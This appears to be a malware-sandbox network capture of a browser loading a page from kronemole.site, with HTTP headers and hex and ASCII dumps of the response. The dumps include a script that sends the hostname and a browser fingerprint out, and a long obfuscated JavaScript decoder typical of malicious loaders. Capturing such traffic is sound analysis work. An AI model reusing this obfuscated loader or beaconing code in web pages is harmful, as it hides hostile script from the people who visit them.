                                                                          37192.168.2.449781172.67.139.604435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:44 UTC740OUTGET /00751fdff8a0f3cf22b7cf59c24e5f09 HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:45 UTC768INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:45 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          pragma: no-cache
                                                                          vary: Accept-Encoding,User-Agent,User-Agent
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2oCR7HQVhrz%2FBlV09DRo%2Ba3V5iFJjzzcaWjWgjZ3mr6A%2BqVLpvSXpWYt9xZYl07MKG6RUH%2BYFf1ay4no696DlRj1XY2wRdGeO5rUb042FIHi0d85hAqyMwbZXMiIqX7w1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aac0fd09c8e-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:45 UTC769INData Raw: 37 63 37 32 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c
                                                                          Data Ascii: 7c72<html lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow, noarchive"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1"> <
                                                                          2023-11-21 16:58:45 UTC769INData Raw: 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 61 73 3d 22 73 74 79 6c 65 22 20 6f 6e 6c 6f 61 64 3d 22 74 68 69 73 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 3b 74 68 69 73 2e 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 22 3e 0a 20 20 3c 6e 6f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 72 6f 6e 65 6d 6f 6c 65 2e 73 69 74 65 2f 61 73 73 65 74 73 2f 6a 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 61
                                                                          Data Ascii: ootstrap.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'"> <noscript><link rel="stylesheet" href="https://kronemole.site/assets/js/vendor/bootstrap/css/bootstrap.min.css"></noscript> ...link rel="stylesheet" type="text/css" href="a
                                                                          2023-11-21 16:58:45 UTC771INData Raw: 20 20 20 20 76 61 72 20 65 73 6f 75 72 63 65 20 3d 20 62 74 6f 61 28 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 29 3b 0a 20 20 20 20 4d 59 43 41 4c 4c 2e 69 6e 69 74 28 5b 73 31 2c 73 32 2c 65 73 6f 75 72 63 65 2c 66 70 5d 29 3b 0a 20 20 20 20 4d 59 43 41 4c 4c 2e 73 65 6e 64 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c
                                                                          Data Ascii: var esource = btoa(location.hostname); MYCALL.init([s1,s2,esource,fp]); MYCALL.send();</script>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getEl
                                                                          2023-11-21 16:58:45 UTC772INData Raw: 6e 5b 65 5d 29 7b 73 2b 3d 68 5b 69 5d 3b 69 2b 2b 7d 66 6f 72 28 76 61 72 20 6a 3d 30 3b 6a 3c 6e 2e 6c 65 6e 67 74 68 3b 6a 2b 2b 29 73 3d 73 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 6e 5b 6a 5d 2c 22 67 22 29 2c 6a 29 3b 72 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 5f 30 78 65 30 63 28 73 2c 65 2c 31 30 29 2d 74 29 7d 72 65 74 75 72 6e 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 72 29 29 7d 28 22 51 56 77 71 56 4b 4b 71 51 56 4b 71 56 77 4b 71 51 48 56 71 51 56 75 71 51 48 48 71 56 4b 48 71 75 77 77 71 56 77 75 71 56 4b 51 71 51 48 4b 71 56 4b 48 71 51 56 75 71 75 4b 77 71 75 4b 4b 71 75 51 51 71 51 51 48 71 56 4b 4b 71 51 56 77 71 56 77 56 71 75 51 48 71 75 51 51 71 51 56
                                                                          Data Ascii: n[e]){s+=h[i];i++}for(var j=0;j<n.length;j++)s=s.replace(new RegExp(n[j],"g"),j);r+=String.fromCharCode(_0xe0c(s,e,10)-t)}return decodeURIComponent(escape(r))}("QVwqVKKqQVKqVwKqQHVqQVuqQHHqVKHquwwqVwuqVKQqQHKqVKHqQVuquKwquKKquQQqQQHqVKKqQVwqVwVquQHquQQqQV
                                                                          2023-11-21 16:58:45 UTC773INData Raw: 51 48 48 71 51 56 75 71 56 4b 56 71 56 4b 56 71 75 51 51 71 75 77 75 71 51 48 51 71 51 48 4b 71 75 51 48 71 75 51 51 71 75 77 75 71 56 77 4b 71 51 48 51 71 75 51 48 71 75 51 51 71 56 4b 56 71 56 4b 77 71 51 51 56 71 51 48 48 71 77 56 48 71 51 56 4b 71 51 48 51 71 51 51 56 71 56 4b 56 71 56 4b 56 71 75 51 56 71 51 75 48 71 77 48 77 71 51 56 4b 71 51 56 48 71 51 51 56 71 56 77 77 71 77 56 48 71 51 48 56 71 51 56 75 71 51 48 48 71 56 77 4b 71 51 51 75 71 51 56 77 71 51 48 75 71 51 75 48 71 77 48 77 71 75 51 48 71 75 51 51 71 56 4b 56 71 56 4b 77 71 51 51 56 71 51 48 48 71 75 51 48 71 75 51 51 71 56 4b 56 71 56 4b 77 71 51 51 56 71 51 48 48 71 77 56 48 71 51 56 4b 71 51 48 51 71 51 51 56 71 56 4b 56 71 56 4b 56 71 75 51 56 71 51 75 48 71 77 48 77 71 51 48 56
                                                                          Data Ascii: QHHqQVuqVKVqVKVquQQquwuqQHQqQHKquQHquQQquwuqVwKqQHQquQHquQQqVKVqVKwqQQVqQHHqwVHqQVKqQHQqQQVqVKVqVKVquQVqQuHqwHwqQVKqQVHqQQVqVwwqwVHqQHVqQVuqQHHqVwKqQQuqQVwqQHuqQuHqwHwquQHquQQqVKVqVKwqQQVqQHHquQHquQQqVKVqVKwqQQVqQHHqwVHqQVKqQHQqQQVqVKVqVKVquQVqQuHqwHwqQHV
                                                                          2023-11-21 16:58:45 UTC775INData Raw: 77 75 71 51 48 51 71 51 48 4b 71 75 51 48 71 75 51 51 71 51 48 51 71 51 48 4b 71 75 51 48 71 75 56 48 71 51 56 75 71 51 51 56 71 51 48 51 71 56 4b 56 71 75 51 51 71 75 77 75 71 51 48 51 71 51 48 4b 71 75 51 48 71 75 51 51 71 51 48 51 71 51 48 4b 71 75 51 48 71 51 75 4b 71 51 48 4b 71 56 4b 51 71 51 56 75 71 51 48 51 71 51 56 75 71 56 4b 56 71 56 4b 56 71 75 51 51 71 75 77 75 71 51 48 51 71 51 48 4b 71 75 51 48 71 75 51 51 71 51 48 51 71 51 48 4b 71 75 51 48 71 75 48 56 71 51 48 48 71 56 4b 48 71 51 56 75 71 56 4b 51 71 51 48 48 71 51 56 75 71 56 4b 48 71 75 51 51 71 75 77 75 71 51 48 51 71 51 48 4b 71 75 51 48 71 75 51 51 71 51 48 51 71 51 48 4b 71 75 51 48 71 51 77 51 71 51 77 48 71 75 51 51 71 75 77 75 71 51 48 51 71 51 48 4b 71 75 51 48 71 75 51 51 71
                                                                          Data Ascii: wuqQHQqQHKquQHquQQqQHQqQHKquQHquVHqQVuqQQVqQHQqVKVquQQquwuqQHQqQHKquQHquQQqQHQqQHKquQHqQuKqQHKqVKQqQVuqQHQqQVuqVKVqVKVquQQquwuqQHQqQHKquQHquQQqQHQqQHKquQHquHVqQHHqVKHqQVuqVKQqQHHqQVuqVKHquQQquwuqQHQqQHKquQHquQQqQHQqQHKquQHqQwQqQwHquQQquwuqQHQqQHKquQHquQQq
                                                                          2023-11-21 16:58:45 UTC776INData Raw: 4b 71 51 48 48 71 77 56 48 71 51 56 4b 71 51 48 51 71 51 51 56 71 56 4b 56 71 56 4b 56 71 75 51 56 71 51 75 48 71 77 48 77 71 51 56 4b 71 56 4b 4b 71 51 48 48 71 56 4b 48 71 51 51 56 71 51 48 4b 71 51 48 48 71 51 56 75 71 56 4b 51 71 75 77 4b 71 56 4b 56 71 56 77 4b 71 56 4b 51 71 56 77 77 71 51 56 75 71 56 77 56 71 77 56 48 71 51 48 56 71 51 51 48 71 75 77 4b 71 75 75 4b 71 51 75 48 71 77 48 77 71 75 51 48 71 75 51 51 71 51 56 77 71 51 48 4b 71 56 77 77 71 77 56 48 71 51 48 4b 71 51 56 77 71 75 51 56 71 51 75 48 71 77 48 77 71 51 56 4b 71 56 4b 4b 71 51 48 48 71 56 4b 48 71 51 51 56 71 51 48 4b 71 51 48 48 71 51 56 75 71 56 4b 51 71 75 77 4b 71 56 4b 56 71 56 77 4b 71 56 4b 51 71 56 77 77 71 51 56 75 71 56 77 56 71 51 75 48 71 77 48 77 71 77 56 48 71 51
                                                                          Data Ascii: KqQHHqwVHqQVKqQHQqQQVqVKVqVKVquQVqQuHqwHwqQVKqVKKqQHHqVKHqQQVqQHKqQHHqQVuqVKQquwKqVKVqVwKqVKQqVwwqQVuqVwVqwVHqQHVqQQHquwKquuKqQuHqwHwquQHquQQqQVwqQHKqVwwqwVHqQHKqQVwquQVqQuHqwHwqQVKqVKKqQHHqVKHqQQVqQHKqQHHqQVuqVKQquwKqVKVqVwKqVKQqVwwqQVuqVwVqQuHqwHwqwVHqQ
                                                                          2023-11-21 16:58:45 UTC777INData Raw: 71 77 56 48 71 51 48 56 71 51 51 48 71 75 77 4b 71 51 48 56 71 51 56 77 71 75 77 4b 71 75 75 4b 71 77 56 48 71 51 48 56 71 51 51 48 71 75 77 4b 71 75 77 56 71 51 75 48 71 75 4b 4b 71 75 51 48 71 75 56 56 71 56 4b 4b 71 51 48 48 71 51 56 56 71 56 4b 51 71 51 51 56 71 56 4b 48 71 56 77 4b 71 51 48 51 71 51 51 56 71 56 4b 48 71 51 48 4b 71 56 4b 4b 71 51 48 48 71 56 4b 56 71 77 56 48 71 51 56 51 71 56 4b 51 71 56 4b 4b 71 51 48 56 71 77 56 48 71 75 51 51 71 56 4b 56 71 56 4b 48 71 56 4b 51 71 56 4b 4b 71 51 48 48 71 51 56 56 71 75 51 48 71 51 48 4b 71 51 48 48 71 51 56 75 71 56 4b 56 71 77 56 48 71 51 56 56 71 56 4b 51 71 56 4b 4b 71 56 77 4b 71 56 4b 77 71 75 51 51 71 75 77 75 71 56 4b 56 71 56 4b 48 71 56 4b 51 71 56 4b 4b 71 51 48 48 71 51 56 56 71 75 51
                                                                          Data Ascii: qwVHqQHVqQQHquwKqQHVqQVwquwKquuKqwVHqQHVqQQHquwKquwVqQuHquKKquQHquVVqVKKqQHHqQVVqVKQqQQVqVKHqVwKqQHQqQQVqVKHqQHKqVKKqQHHqVKVqwVHqQVQqVKQqVKKqQHVqwVHquQQqVKVqVKHqVKQqVKKqQHHqQVVquQHqQHKqQHHqQVuqVKVqwVHqQVVqVKQqVKKqVwKqVKwquQQquwuqVKVqVKHqVKQqVKKqQHHqQVVquQ
                                                                          2023-11-21 16:58:45 UTC779INData Raw: 51 56 75 71 56 4b 48 71 56 4b 48 71 51 56 75 71 56 4b 51 71 77 56 48 71 51 51 56 71 51 48 48 71 51 56 77 71 77 56 48 71 51 48 4b 71 51 48 56 71 56 4b 77 71 56 4b 51 71 56 4b 4b 71 56 77 77 71 51 56 75 71 77 56 48 71 56 4b 4b 71 56 77 4b 71 56 4b 51 71 77 56 48 71 56 4b 77 71 56 4b 51 71 56 4b 4b 71 51 56 77 71 56 77 4b 71 51 56 4b 71 56 4b 48 71 56 4b 56 71 77 56 48 71 51 51 56 71 51 48 48 71 51 56 77 71 77 56 48 71 56 4b 56 71 51 56 75 71 56 4b 51 71 56 77 77 71 51 48 4b 71 51 56 4b 71 51 56 75 71 56 4b 56 71 75 77 77 71 75 51 51 71 75 77 75 71 56 4b 77 71 75 51 48 71 75 51 51 71 56 4b 77 71 77 56 48 71 51 56 4b 71 51 48 51 71 51 51 56 71 56 4b 56 71 56 4b 56 71 75 51 56 71 51 75 48 71 77 48 77 71 51 48 56 71 51 56 75 71 56 4b 56 71 56 4b 56 71 51 51 56
                                                                          Data Ascii: QVuqVKHqVKHqQVuqVKQqwVHqQQVqQHHqQVwqwVHqQHKqQHVqVKwqVKQqVKKqVwwqQVuqwVHqVKKqVwKqVKQqwVHqVKwqVKQqVKKqQVwqVwKqQVKqVKHqVKVqwVHqQQVqQHHqQVwqwVHqVKVqQVuqVKQqVwwqQHKqQVKqQVuqVKVquwwquQQquwuqVKwquQHquQQqVKwqwVHqQVKqQHQqQQVqVKVqVKVquQVqQuHqwHwqQHVqQVuqVKVqVKVqQQV
                                                                          2023-11-21 16:58:45 UTC780INData Raw: 56 48 71 51 56 51 71 51 48 4b 71 51 48 48 71 51 48 4b 71 56 4b 56 71 51 56 48 71 51 56 75 71 51 56 77 71 77 56 48 71 56 4b 48 71 51 56 48 71 51 56 75 71 77 56 48 71 56 4b 56 71 56 77 4b 71 56 4b 51 71 56 77 77 71 51 56 75 71 56 77 56 71 77 56 48 71 56 4b 48 71 56 4b 4b 71 51 56 77 71 51 51 56 71 56 77 56 71 75 77 77 71 77 56 48 71 51 4b 56 71 51 48 48 71 51 48 51 71 56 77 56 71 77 56 48 71 75 75 77 71 77 56 48 71 51 48 51 71 56 77 4b 71 51 56 4b 71 51 48 75 71 56 77 56 71 77 56 48 71 56 77 4b 71 56 4b 56 71 51 56 75 71 56 4b 51 71 56 4b 56 71 77 56 48 71 51 48 51 71 51 56 75 71 51 56 51 71 56 4b 48 71 75 77 77 71 75 51 51 71 75 77 75 71 56 4b 77 71 75 51 48 71 75 51 51 71 51 56 48 71 56 4b 51 71 75 51 48 71 75 51 51 71 56 4b 77 71 77 56 48 71 51 56 4b 71
                                                                          Data Ascii: VHqQVQqQHKqQHHqQHKqVKVqQVHqQVuqQVwqwVHqVKHqQVHqQVuqwVHqVKVqVwKqVKQqVwwqQVuqVwVqwVHqVKHqVKKqQVwqQQVqVwVquwwqwVHqQKVqQHHqQHQqVwVqwVHquuwqwVHqQHQqVwKqQVKqQHuqVwVqwVHqVwKqVKVqQVuqVKQqVKVqwVHqQHQqQVuqQVQqVKHquwwquQQquwuqVKwquQHquQQqQVHqVKQquQHquQQqVKwqwVHqQVKq
                                                                          2023-11-21 16:58:45 UTC781INData Raw: 51 71 56 4b 4b 71 56 4b 51 71 75 77 4b 71 56 4b 77 71 56 4b 51 71 51 48 4b 71 51 48 56 71 51 51 56 71 56 4b 51 71 56 77 56 71 75 77 4b 71 56 4b 48 71 51 56 75 71 56 77 51 71 56 4b 48 71 51 75 48 71 77 48 77 71 77 56 48 71 56 4b 51 71 56 4b 4b 71 51 48 51 71 51 56 75 71 75 51 56 71 51 75 48 71 77 48 77 71 56 4b 56 71 56 4b 48 71 51 51 56 71 56 4b 48 71 56 77 4b 71 56 4b 56 71 51 75 48 71 77 48 77 71 75 51 48 71 75 51 51 71 56 4b 56 71 56 4b 77 71 51 51 56 71 51 48 48 71 77 56 48 71 51 56 4b 71 51 48 51 71 51 51 56 71 56 4b 56 71 56 4b 56 71 75 51 56 71 51 75 48 71 77 48 77 71 56 4b 56 71 56 4b 51 71 75 77 4b 71 56 4b 4b 71 51 48 48 71 51 48 51 71 56 77 56 71 51 75 48 71 77 48 77 71 75 51 48 71 51 4b 77 71 56 4b 4b 71 51 51 56 71 51 56 77 71 51 48 4b 71 51
                                                                          Data Ascii: QqVKKqVKQquwKqVKwqVKQqQHKqQHVqQQVqVKQqVwVquwKqVKHqQVuqVwQqVKHqQuHqwHwqwVHqVKQqVKKqQHQqQVuquQVqQuHqwHwqVKVqVKHqQQVqVKHqVwKqVKVqQuHqwHwquQHquQQqVKVqVKwqQQVqQHHqwVHqQVKqQHQqQQVqVKVqVKVquQVqQuHqwHwqVKVqVKQquwKqVKKqQHHqQHQqVwVqQuHqwHwquQHqQKwqVKKqQQVqQVwqQHKqQ
                                                                          2023-11-21 16:58:45 UTC783INData Raw: 71 56 4b 48 71 75 77 48 71 51 75 48 71 77 48 77 71 75 51 48 71 75 51 51 71 51 56 77 71 51 48 4b 71 56 77 77 71 75 51 48 71 75 51 51 71 56 4b 56 71 56 4b 77 71 51 51 56 71 51 48 48 71 77 56 48 71 51 56 4b 71 51 48 51 71 51 51 56 71 56 4b 56 71 56 4b 56 71 75 51 56 71 51 75 48 71 77 48 77 71 56 4b 48 71 51 48 75 71 51 51 75 71 51 56 51 71 56 4b 4b 71 56 4b 51 71 51 75 48 71 77 48 77 71 75 51 48 71 51 77 51 71 51 56 48 71 51 51 56 71 51 48 48 71 51 48 75 71 77 56 48 71 56 77 56 71 56 4b 4b 71 56 77 4b 71 77 56 48 71 51 56 51 71 56 4b 4b 71 56 4b 51 71 75 51 51 71 56 4b 56 71 56 4b 77 71 51 51 56 71 51 48 48 71 75 51 48 71 77 56 48 71 51 56 4b 71 56 4b 4b 71 51 48 56 71 56 4b 77 71 51 48 51 71 51 56 75 71 56 4b 48 71 51 48 4b 71 51 48 48 71 51 56 56 71 77 56
                                                                          Data Ascii: qVKHquwHqQuHqwHwquQHquQQqQVwqQHKqVwwquQHquQQqVKVqVKwqQQVqQHHqwVHqQVKqQHQqQQVqVKVqVKVquQVqQuHqwHwqVKHqQHuqQQuqQVQqVKKqVKQqQuHqwHwquQHqQwQqQVHqQQVqQHHqQHuqwVHqVwVqVKKqVwKqwVHqQVQqVKKqVKQquQQqVKVqVKwqQQVqQHHquQHqwVHqQVKqVKKqQHVqVKwqQHQqQVuqVKHqQHKqQHHqQVVqwV
                                                                          2023-11-21 16:58:45 UTC784INData Raw: 75 51 48 71 75 51 51 71 75 77 75 71 56 4b 56 71 56 4b 77 71 51 51 56 71 51 48 48 71 75 51 48 71 77 56 48 71 75 51 51 71 56 4b 56 71 56 4b 77 71 51 51 56 71 51 48 48 71 77 56 48 71 51 56 4b 71 51 48 51 71 51 51 56 71 56 4b 56 71 56 4b 56 71 75 51 56 71 51 75 48 71 75 4b 4b 71 56 4b 48 71 51 56 75 71 56 77 51 71 56 4b 48 71 75 77 48 71 51 77 51 71 77 56 48 71 56 4b 48 71 56 77 51 71 75 77 48 71 56 4b 48 71 51 75 48 71 75 4b 4b 71 75 51 48 71 51 77 75 71 56 77 4b 71 56 4b 77 71 56 4b 77 71 51 48 51 71 56 77 56 71 77 56 48 71 51 48 4b 71 56 4b 56 71 77 56 48 71 51 56 75 71 56 77 51 71 56 4b 48 71 56 4b 51 71 51 56 75 71 51 48 56 71 51 56 75 71 51 48 51 71 56 77 56 71 77 56 48 71 51 48 51 71 51 48 4b 71 51 48 56 71 51 48 4b 71 56 4b 48 71 51 56 75 71 51 56 77
                                                                          Data Ascii: uQHquQQquwuqVKVqVKwqQQVqQHHquQHqwVHquQQqVKVqVKwqQQVqQHHqwVHqQVKqQHQqQQVqVKVqVKVquQVqQuHquKKqVKHqQVuqVwQqVKHquwHqQwQqwVHqVKHqVwQquwHqVKHqQuHquKKquQHqQwuqVwKqVKwqVKwqQHQqVwVqwVHqQHKqVKVqwVHqQVuqVwQqVKHqVKQqQVuqQHVqQVuqQHQqVwVqwVHqQHQqQHKqQHVqQHKqVKHqQVuqQVw
                                                                          2023-11-21 16:58:45 UTC785INData Raw: 51 56 75 71 75 51 56 71 51 75 48 71 77 48 77 71 75 77 51 71 51 75 48 71 77 48 77 71 75 51 48 71 75 51 51 71 51 48 4b 71 51 48 48 71 56 4b 77 71 56 77 4b 71 56 4b 48 71 77 56 48 71 51 48 4b 71 51 56 77 71 75 51 56 71 51 75 48 71 77 48 77 71 56 4b 56 71 56 77 4b 71 51 51 48 71 51 48 56 71 51 48 4b 71 56 4b 48 71 75 77 4b 71 51 48 51 71 51 51 56 71 51 48 48 71 51 56 56 71 51 75 48 71 77 48 77 71 77 56 48 71 56 4b 48 71 56 77 56 71 56 4b 77 71 51 56 75 71 75 51 56 71 51 75 48 71 77 48 77 71 51 56 48 71 51 48 4b 71 51 56 77 71 51 56 77 71 51 56 75 71 51 48 48 71 51 75 48 71 77 48 77 71 77 56 48 71 56 77 77 71 51 51 56 71 51 48 51 71 56 77 4b 71 51 56 75 71 75 51 56 71 51 75 48 71 77 48 77 71 51 77 75 71 56 77 4b 71 51 51 48 71 51 48 56 71 51 48 4b 71 56 4b 48
                                                                          Data Ascii: QVuquQVqQuHqwHwquwQqQuHqwHwquQHquQQqQHKqQHHqVKwqVwKqVKHqwVHqQHKqQVwquQVqQuHqwHwqVKVqVwKqQQHqQHVqQHKqVKHquwKqQHQqQQVqQHHqQVVqQuHqwHwqwVHqVKHqVwVqVKwqQVuquQVqQuHqwHwqQVHqQHKqQVwqQVwqQVuqQHHqQuHqwHwqwVHqVwwqQQVqQHQqVwKqQVuquQVqQuHqwHwqQwuqVwKqQQHqQHVqQHKqVKH
                                                                          2023-11-21 16:58:45 UTC787INData Raw: 48 77 71 77 56 48 71 56 4b 56 71 51 48 4b 71 51 56 77 71 75 51 56 71 51 75 48 71 77 48 77 71 75 77 51 71 51 75 48 71 77 48 77 71 77 56 48 71 56 4b 56 71 56 4b 48 71 56 77 56 71 51 48 51 71 51 56 75 71 75 51 56 71 51 75 48 71 77 48 77 71 51 56 77 71 51 48 4b 71 56 4b 56 71 56 4b 77 71 51 48 51 71 51 51 56 71 56 77 56 71 75 51 77 71 51 48 48 71 56 4b 4b 71 51 48 48 71 51 56 75 71 75 51 75 71 51 75 48 71 77 48 77 71 75 51 48 71 75 51 51 71 51 56 77 71 51 48 4b 71 56 77 77 71 77 56 48 71 51 56 4b 71 51 48 51 71 51 51 56 71 56 4b 56 71 56 4b 56 71 75 51 56 71 51 75 48 71 77 48 77 71 51 56 4b 71 51 56 48 71 56 4b 4b 71 51 48 4b 71 51 56 4b 71 51 56 75 71 56 4b 56 71 51 75 48 71 77 48 77 71 75 51 48 71 75 51 51 71 51 56 77 71 51 48 4b 71 56 77 77 71 77 56 48 71
                                                                          Data Ascii: HwqwVHqVKVqQHKqQVwquQVqQuHqwHwquwQqQuHqwHwqwVHqVKVqVKHqVwVqQHQqQVuquQVqQuHqwHwqQVwqQHKqVKVqVKwqQHQqQQVqVwVquQwqQHHqVKKqQHHqQVuquQuqQuHqwHwquQHquQQqQVwqQHKqVwwqwVHqQVKqQHQqQQVqVKVqVKVquQVqQuHqwHwqQVKqQVHqVKKqQHKqQVKqQVuqVKVqQuHqwHwquQHquQQqQVwqQHKqVwwqwVHq
                                                                          2023-11-21 16:58:45 UTC788INData Raw: 4b 71 56 77 77 71 75 51 48 71 75 51 51 71 51 56 77 71 51 48 4b 71 56 77 77 71 77 56 48 71 51 56 4b 71 51 48 51 71 51 51 56 71 56 4b 56 71 56 4b 56 71 75 51 56 71 51 75 48 71 77 48 77 71 56 77 77 71 51 51 56 71 51 48 51 71 51 48 4b 71 51 56 77 71 51 51 56 71 56 4b 48 71 51 56 75 71 51 51 75 71 56 4b 56 71 77 56 48 71 51 56 48 71 51 48 4b 71 51 56 77 71 51 56 77 71 51 56 75 71 51 48 48 71 77 56 48 71 51 48 51 71 56 4b 4b 71 51 51 56 71 51 56 77 71 51 51 75 71 51 51 48 71 51 48 51 71 56 4b 4b 71 51 56 4b 71 51 48 75 71 77 56 48 71 51 56 77 71 56 77 77 71 51 51 75 71 51 51 48 71 51 56 56 71 77 56 48 71 51 56 77 71 56 77 77 71 51 51 75 71 56 4b 48 71 56 77 51 71 51 75 48 71 77 48 77 71 75 51 48 71 75 51 51 71 51 56 77 71 51 48 4b 71 56 77 77 71 77 56 48 71 56
                                                                          Data Ascii: KqVwwquQHquQQqQVwqQHKqVwwqwVHqQVKqQHQqQQVqVKVqVKVquQVqQuHqwHwqVwwqQQVqQHQqQHKqQVwqQQVqVKHqQVuqQQuqVKVqwVHqQVHqQHKqQVwqQVwqQVuqQHHqwVHqQHQqVKKqQQVqQVwqQQuqQQHqQHQqVKKqQVKqQHuqwVHqQVwqVwwqQQuqQQHqQVVqwVHqQVwqVwwqQQuqVKHqVwQqQuHqwHwquQHquQQqQVwqQHKqVwwqwVHqV
                                                                          2023-11-21 16:58:45 UTC789INData Raw: 71 51 51 56 71 75 77 4b 71 56 77 77 71 51 51 56 71 51 48 51 71 56 77 4b 71 51 56 75 71 51 48 56 71 51 51 56 71 56 77 51 71 75 51 56 71 51 75 48 71 77 48 77 71 75 77 56 71 75 77 51 71 75 77 51 71 51 75 48 71 77 48 77 71 75 51 48 71 75 51 51 71 75 77 75 71 51 56 77 71 51 48 4b 71 56 77 77 71 75 51 48 71 75 51 51 71 75 77 75 71 51 56 77 71 51 48 4b 71 56 77 77 71 75 51 48 71 75 51 51 71 75 77 75 71 51 56 77 71 51 48 4b 71 56 77 77 71 75 51 48 71 75 51 51 71 51 56 77 71 51 48 4b 71 56 77 77 71 77 56 48 71 51 56 4b 71 51 48 51 71 51 51 56 71 56 4b 56 71 56 4b 56 71 75 51 56 71 51 75 48 71 77 48 77 71 56 4b 77 71 56 77 56 71 75 77 4b 71 75 75 4b 71 77 56 48 71 56 4b 77 71 56 77 51 71 75 77 4b 71 75 75 77 71 51 75 48 71 77 48 77 71 75 51 48 71 75 51 51 71 56 4b
                                                                          Data Ascii: qQQVquwKqVwwqQQVqQHQqVwKqQVuqQHVqQQVqVwQquQVqQuHqwHwquwVquwQquwQqQuHqwHwquQHquQQquwuqQVwqQHKqVwwquQHquQQquwuqQVwqQHKqVwwquQHquQQquwuqQVwqQHKqVwwquQHquQQqQVwqQHKqVwwqwVHqQVKqQHQqQQVqVKVqVKVquQVqQuHqwHwqVKwqVwVquwKquuKqwVHqVKwqVwQquwKquuwqQuHqwHwquQHquQQqVK
